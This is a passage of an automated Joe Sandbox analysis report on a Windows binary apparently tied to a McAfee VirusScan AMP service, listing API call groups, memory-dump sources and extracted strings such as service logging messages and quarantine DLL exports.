                                            • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                            • String ID: ampStopSingletone: logging ended
                                            • API String ID: 2048888615-3533855269
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ErrorLastManagerOpen$FileModuleName
                                            • String ID: /remove$/service$vseamps
                                            • API String ID: 67513587-3839141145
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                            • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                            • GetProcAddress.KERNEL32 ref: 000000014000F117
                                              • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressProc$Load$Library
                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                            • API String ID: 3981747205-232180764
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                            • String ID:
                                            • API String ID: 4284112124-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                            • String ID: vseamps
                                            • API String ID: 3693165506-3944098904
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: FileModuleName
                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                            • API String ID: 514040917-4022980321
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                            • String ID:
                                            • API String ID: 2057259594-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                            • String ID:
                                            • API String ID: 3103264659-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 1269745586-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            APIs
                                            • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                            • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContext
                                            • String ID:
                                            • API String ID: 2202868296-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            Similarity
                                            • API ID: ExceptionRaise_clrfp
                                            • String ID:
                                            • API String ID: 15204871-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 203985260-0
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: EntryFunctionLookup
                                            • String ID:
                                            • API String ID: 3852435196-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            APIs
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Control-flow Graph

                                            [Control-flow graph starting at 1400038d0; legend: Executed / Not Executed]
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                            • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                            • API String ID: 1021822269-3147033232

                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                            • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                            • API String ID: 883923345-381368982
                                            APIs
                                            Similarity
                                            • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                            • String ID:
                                            • API String ID: 1613947383-0
                                            APIs
                                            Similarity
                                            • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                            • String ID:
                                            • API String ID: 1995290849-0
                                            APIs
                                            Similarity
                                            • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                            • String ID:
                                            • API String ID: 1995290849-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                            • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                            • API String ID: 93015348-1041928032
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                            • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                            • API String ID: 3682727354-300733478
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                            • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                            • API String ID: 2587151837-1427723692
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                            • String ID: SetDllDirectoryW$kernel32.dll
                                            • API String ID: 3184163350-3826188083
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrlen
                                            • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                            • API String ID: 3424473247-996641649
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: String$ByteCharMultiWide$ErrorLast
                                            • String ID:
                                            • API String ID: 1775797328-0
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                            • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                            • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                            • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                            • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 1232609184-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                            • String ID: H
                                            • API String ID: 2107338056-2852464175
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                            • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                            • API String ID: 1322048431-2685357988
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeaveTimerWaitable
                                            • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                            • API String ID: 2984211723-3002863673
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                            • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                            • API String ID: 678758403-4129911376
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrlen
                                            • String ID:
                                            • API String ID: 3424473247-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                            • String ID: bad exception$csm$csm$csm
                                            • API String ID: 3766904988-820278400
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                            • String ID:
                                            • API String ID: 2707001247-0
                                            APIs
                                            • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFB23B04861
                                              • Part of subcall function 00007FFB23B06BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFB23B06C07
                                              • Part of subcall function 00007FFB23B06BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFB23B06C2C
                                            • Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFB23B04939
                                            • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFB23B04B87
                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFB23B04C94
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            APIs
                                            Strings
                                            Memory Dump Source
